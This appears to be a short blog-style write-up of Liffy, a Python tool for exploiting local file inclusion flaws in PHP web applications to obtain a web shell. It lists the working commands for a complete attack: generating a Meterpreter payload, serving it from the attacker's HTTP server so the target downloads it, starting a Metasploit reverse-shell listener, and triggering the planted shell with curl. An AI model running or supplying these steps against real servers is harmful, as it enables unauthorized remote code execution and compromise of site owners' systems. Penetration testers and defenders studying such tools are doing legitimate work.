Liffy is a tool written in Python designed to exploit local file inclusion vulnerabilities using three different techniques that will get you a working web shell. The first two make use of the built-in PHP wrappers php://input and data://. The third makes use of the process control extension called ‘expect’.
For those unfamiliar I’ve included some links that highlight the usage of these techniques in LFI exploitation.
Once you have found an local file inclusion vulnerability, you simply point liffy at its location and select which technique you want to use.
./liffy --url http://target/vuln/file.php?= --data
The tool will create a PHP Meterpreter payload using msfpayload and drop it into your /tmp directory. It will then attempt to use the PHP wrapper to download the generated shell which you should have hosted by either using Node or Python’s HTTP web servers.
http-server /tmp -p 8000
If all this works you should see a GET request to your shell, which is then downloaded to the working directory on the target webserver. From there a Metasploit resource file is created for you to spawn up a listening handler for inbound connections from the reverse PHP Meterpreter.
msfconsole -r php_listener.rc
Now you simply curl the location of your webshell and you should get see a new Meterpreter session spawn
curl --silent http://target/vuln/7ka0tqsq.php